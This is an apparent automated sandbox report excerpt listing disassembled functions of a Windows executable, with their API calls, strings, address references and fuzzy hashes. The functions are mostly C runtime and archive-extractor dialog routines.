_free.LIBCMT ref: 0024BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0024BFA4

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: b1dcf2324ef9b56a2571b5e2ea84d7feb75d5882e91e342d3a71e49821a5b33e
Instruction ID: 9ba1b8699065f02b9886478a1602055a00e6a3ccb0083454806d610f4084508f
Opcode Fuzzy Hash: b1dcf2324ef9b56a2571b5e2ea84d7feb75d5882e91e342d3a71e49821a5b33e
Instruction Fuzzy Hash: 7401D4726217127F27265ABA6C4CC7B6A6DDECABA13164129F90CC2100EF70CD1599B0

Function 00249869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,002491AD,0024B188,?,00249813,00000001,00000364,?,002440EF,?,?,00261098), ref: 0024986E
_free.LIBCMT ref: 002498A3
_free.LIBCMT ref: 002498CA
SetLastError.KERNEL32(00000000,?,00261098), ref: 002498D7
SetLastError.KERNEL32(00000000,?,00261098), ref: 002498E0

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: c90563fb05bd088a7676b88919eccb889557cebc4404e14b1830f0cc18d95130
Instruction ID: 2424e5aaeecde34c1e3edb2c858f8ff33bac3987359e801c449416c7f424972a
Opcode Fuzzy Hash: c90563fb05bd088a7676b88919eccb889557cebc4404e14b1830f0cc18d95130
Instruction Fuzzy Hash: 7F0144362B1702ABC71EAB3C7C8992B252EDFD33B27210134F51492192EE708D714629

Function 00230EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 002311CF: ResetEvent.KERNEL32(?), ref: 002311E1
Part of subcall function 002311CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 002311F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00230F21
CloseHandle.KERNEL32(?,?), ref: 00230F3B
DeleteCriticalSection.KERNEL32(?), ref: 00230F54
CloseHandle.KERNEL32(?), ref: 00230F60
CloseHandle.KERNEL32(?), ref: 00230F6C

Part of subcall function 00230FE4: WaitForSingleObject.KERNEL32(?,000000FF,00231101,?,?,0023117F,?,?,?,?,?,00231169), ref: 00230FEA
Part of subcall function 00230FE4: GetLastError.KERNEL32(?,?,0023117F,?,?,?,?,?,00231169), ref: 00230FF6

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: e0e7ee90a3504c1e0154d5979612d6c66c9adbc9aa3bedaa89e1fa99ba792151
Instruction ID: 12bf1c35f8aa0057222c341c7c2eb2a95f9e83491a692f911f048ed2c87557c2
Opcode Fuzzy Hash: e0e7ee90a3504c1e0154d5979612d6c66c9adbc9aa3bedaa89e1fa99ba792151
Instruction Fuzzy Hash: 36017571110744EFC722DF64EC88BC6FBA9FB08751F000929F15B525A0CB757A54DB54

Function 0024C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0024C817

Part of subcall function 00248DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0024C896,?,00000000,?,00000000,?,0024C8BD,?,00000007,?,?,0024CCBA,?), ref: 00248DE2
Part of subcall function 00248DCC: GetLastError.KERNEL32(?,?,0024C896,?,00000000,?,00000000,?,0024C8BD,?,00000007,?,?,0024CCBA,?,?), ref: 00248DF4

_free.LIBCMT ref: 0024C829
_free.LIBCMT ref: 0024C83B
_free.LIBCMT ref: 0024C84D
_free.LIBCMT ref: 0024C85F

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 95582f0e60364d007035ed81d01aefb695d0fe0c24a0dac32462b4de030af411
Instruction ID: 4ffac403f37464515173d998ae6ef0ea6d83f5bfee9e2ee71b023540790ec531
Opcode Fuzzy Hash: 95582f0e60364d007035ed81d01aefb695d0fe0c24a0dac32462b4de030af411
Instruction Fuzzy Hash: C5F06832932201EB8A5DEF7CF58AC0E73E9AA107217650819F104D7552CF70FC50CA54

Function 00231FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00231FE5
_wcslen.LIBCMT ref: 00231FF6
_wcslen.LIBCMT ref: 00232006
_wcslen.LIBCMT ref: 00232014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0022B371,?,?,00000000,?,?,?), ref: 0023202F

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 5d10c44fb479453c3a660bedf8349bb05fa63e78fd2141b088b560349b04d980
Instruction ID: a956e979073ff1dddbe1c8969483f523f1e42a81864357baf560e05fb29b98c3
Opcode Fuzzy Hash: 5d10c44fb479453c3a660bedf8349bb05fa63e78fd2141b088b560349b04d980
Instruction Fuzzy Hash: 67F06D32128114BBCF2A9F50EC09E8E3F26EF40770F118005F61A5A061CB729679DA90

Function 002315FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 002317BC
_swprintf.LIBCMT ref: 0023186B

Strings

%ls, xrefs: 00231641, 00231657
%s: %s, xrefs: 002317CB

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 2c81403c899d7663774cd9bc47877c2779fc644a1e01f6ead149512a8e95671b
Instruction ID: 6f9b271f4040401fae431631b8b28610ed9c7ace3136c4e1c32782afa8b0ebfd
Opcode Fuzzy Hash: 2c81403c899d7663774cd9bc47877c2779fc644a1e01f6ead149512a8e95671b
Instruction Fuzzy Hash: C451DBF5678300F6FA221ED48D47F35B66DAB05B04F248506F386684E1DAF2A470AF1E

Function 00247F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\kqq1aAcVUQ.exe,00000104), ref: 00247FAE
_free.LIBCMT ref: 00248079
_free.LIBCMT ref: 00248083

Strings

C:\Users\user\Desktop\kqq1aAcVUQ.exe, xrefs: 00247FA5, 00247FAC, 00247FDB, 00248013

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\kqq1aAcVUQ.exe
API String ID: 2506810119-1025207620
Opcode ID: a4d7984c2292804b629a99b3e0f1fa1e9491613f4139a3ee245949c9e3c961a4
Instruction ID: ee716bbdc50082f732bf0b2dfee98e26cdb6908f885c4ddb80ce4ea1c67fc1f7
Opcode Fuzzy Hash: a4d7984c2292804b629a99b3e0f1fa1e9491613f4139a3ee245949c9e3c961a4
Instruction Fuzzy Hash: 3E31C0B1A30219EFDB29DF99D88499EBBFCEF95310F104066F90497211DBB18E58CB61

Function 002431D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 002431FB
_abort.LIBCMT ref: 00243306

Strings

RCC, xrefs: 00243215
MOC, xrefs: 0024320D

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 3569ae21c64babd55571b5038d3988312be74d4cee1194e2cc9c128c84e80b3a
Instruction ID: 12252f8be6d902f7874b0de37fbc18ea297d29b9619f2fcd9d210c4123239dfe
Opcode Fuzzy Hash: 3569ae21c64babd55571b5038d3988312be74d4cee1194e2cc9c128c84e80b3a
Instruction Fuzzy Hash: A941387191020AAFCF19DF94CD82AAEBBB5BF48304F148199F904A7216D375AE60DF90

Function 00227401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00227406

Part of subcall function 00223BBA: __EH_prolog.LIBCMT ref: 00223BBF

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 002274CD

Part of subcall function 00227A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00227AAB
Part of subcall function 00227A9C: GetLastError.KERNEL32 ref: 00227AF1
Part of subcall function 00227A9C: CloseHandle.KERNEL32(?), ref: 00227B00

Strings

SeRestorePrivilege, xrefs: 00227460
SeSecurityPrivilege, xrefs: 0022744B

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 8cd87669afc90a57cc5934c4b943b3e2b95e503c6501f9c5725d87e07cb6fe4c
Instruction ID: 2b370948647110a8552290da8b058c23e96b4eb5d3420949bb16cc67089aba1a
Opcode Fuzzy Hash: 8cd87669afc90a57cc5934c4b943b3e2b95e503c6501f9c5725d87e07cb6fe4c
Instruction Fuzzy Hash: E531B4B1D28269BADF11EFE4EC45BEEBBB9AF19304F044015F805A7181D7749A78CB60

Function 0023AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00221316: GetDlgItem.USER32(00000000,00003021), ref: 0022135A
Part of subcall function 00221316: SetWindowTextW.USER32(00000000,002535F4), ref: 00221370

EndDialog.USER32(?,00000001), ref: 0023AD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0023ADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 0023ADC2

Strings

ASKNEXTVOL, xrefs: 0023AD28

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: cfc167bd08746c5dacf5efeba238740a202a607b7c5a87f727d349dc654ed29b
Instruction ID: 2408c529d5da586a8014a339efa208077b80bc51095f7b49ccbc1efde6d2c707
Opcode Fuzzy Hash: cfc167bd08746c5dacf5efeba238740a202a607b7c5a87f727d349dc654ed29b
Instruction Fuzzy Hash: F311D3722A1215BFD7118FA8EC09FAA376DEB4A702F000021F281EB5E0C76199359B23

Function 0023DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,0001042E,0023B270,?,?), ref: 0023DE18

Strings

xz', xrefs: 0023DE28
r#, xrefs: 0023DDDC
GETPASSWORD1, xrefs: 0023DE0D

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$r#$xz'
API String ID: 665744214-2528595507
Opcode ID: cd665600e37e33a684137ce75e85c97c2d0dd949e83775476f24c46d5b78c703
Instruction ID: 8d33f1f6aa7abc7337b80dddb20dcf40e0d25edec51b7202dc2b016d0ab7bb8c
Opcode Fuzzy Hash: cd665600e37e33a684137ce75e85c97c2d0dd949e83775476f24c46d5b78c703
Instruction Fuzzy Hash: 9A110B72620154AADB12DE34BC05BAB37A4A70A751F144475FD45AB081CAB4ACA4C764

Function 0022D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0022D954
_strncpy.LIBCMT ref: 0022D99A

Part of subcall function 00231DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00261030,?,0022D928,00000000,?,00000050,00261030), ref: 00231DC4

Strings

@%s, xrefs: 0022D93E
$%s, xrefs: 0022D949

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 15c2331afd832a1bbd40eecb518105a5e3fa9e394e954399dfce3a1b1a530a11
Instruction ID: 5929a4356a513f7d103f2c5e490cf2c59f292abef79d78cbf4d9bdd79aa49659
Opcode Fuzzy Hash: 15c2331afd832a1bbd40eecb518105a5e3fa9e394e954399dfce3a1b1a530a11
Instruction Fuzzy Hash: F7219072460259BAEF21EFE4DC45FDE7BA8AF06300F040012F910961A2E271D6A88F51

Function 00230E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0022AC5A,00000008,?,00000000,?,0022D22D,?,00000000), ref: 00230E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0022AC5A,00000008,?,00000000,?,0022D22D,?,00000000), ref: 00230E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0022AC5A,00000008,?,00000000,?,0022D22D,?,00000000), ref: 00230E9F

Strings

Thread pool initialization failed., xrefs: 00230EB7

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 2e3b1902327c43a2ad66849ac7a121172c1ac27cab55f550fc0910e43a104290
Instruction ID: 8443fd2ae9164a4c6b0e49b38f8b4700dc656fa6b554f3110557ac32ce4d28b7
Opcode Fuzzy Hash: 2e3b1902327c43a2ad66849ac7a121172c1ac27cab55f550fc0910e43a104290
Instruction Fuzzy Hash: 8411C1B1710709AFC3209F66ACC89A7FBECEB64744F144C2EF1CAC2200D6B169508B64

Function 0022124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 0022125D

Strings

2#, xrefs: 00221292
(#, xrefs: 002212A3
A, xrefs: 00221285

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Malloc
String ID: (#$2#$A
API String ID: 2696272793-3261752882
Opcode ID: 7aee9cb309446751b8fb3d46e30f855ef2f2f0f37f7ade76e4b7d52b6a82c33b
Instruction ID: 2472e4beb78189f6c5abfb75b7ad16759e82adfcb69fad58d3c6fc93c6972e2a
Opcode Fuzzy Hash: 7aee9cb309446751b8fb3d46e30f855ef2f2f0f37f7ade76e4b7d52b6a82c33b
Instruction Fuzzy Hash: 2701D775901229ABCB14DFA4EC48AEEBBF8EF09710B10416AE906E7250D7749E50CFA4

Function 0023DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 0023DD31
REPLACEFILEDLG, xrefs: 0023DD1C, 0023DD50

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 4e90f7b5d516566cc4314597fc4bad14717cb94f5420cea418059a53331efcfd
Instruction ID: 3586633ae4d350cbf7366c2db947c7d338c87d331fc3a906c3a78acff3593b77
Opcode Fuzzy Hash: 4e90f7b5d516566cc4314597fc4bad14717cb94f5420cea418059a53331efcfd
Instruction Fuzzy Hash: 240188BB624249AFDB119F64FC4CA567BA8F709354F144525F805D3230CAB198B0DBA1

Function 00221316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0022E2E8: _swprintf.LIBCMT ref: 0022E30E
Part of subcall function 0022E2E8: _strlen.LIBCMT ref: 0022E32F
Part of subcall function 0022E2E8: SetDlgItemTextW.USER32(?,0025E274,?), ref: 0022E38F
Part of subcall function 0022E2E8: GetWindowRect.USER32(?,?), ref: 0022E3C9
Part of subcall function 0022E2E8: GetClientRect.USER32(?,?), ref: 0022E3D5

GetDlgItem.USER32(00000000,00003021), ref: 0022135A
SetWindowTextW.USER32(00000000,002535F4), ref: 00221370

Strings

0, xrefs: 00221319
#, xrefs: 0022134A

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: #$0
API String ID: 2622349952-1320880470
Opcode ID: cc0d3d6ec1a60473a45c041e6d1e2e8ff6b8fd2c3a4c316c5f951b8065074fbe
Instruction ID: 0c77193cc48903b531afe22bf53ff039a206ad1f58b8375591374b43310ec4a9
Opcode Fuzzy Hash: cc0d3d6ec1a60473a45c041e6d1e2e8ff6b8fd2c3a4c316c5f951b8065074fbe
Instruction Fuzzy Hash: 24F0A4311242A9B6DF159F90EC0DFE93B5BAF24744F494254FC4990591DB74C9B0EB10

Function 00249A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00249AA9
__alldvrm.LIBCMT ref: 00249CAA
__alldvrm.LIBCMT ref: 00249CCC

Memory Dump Source

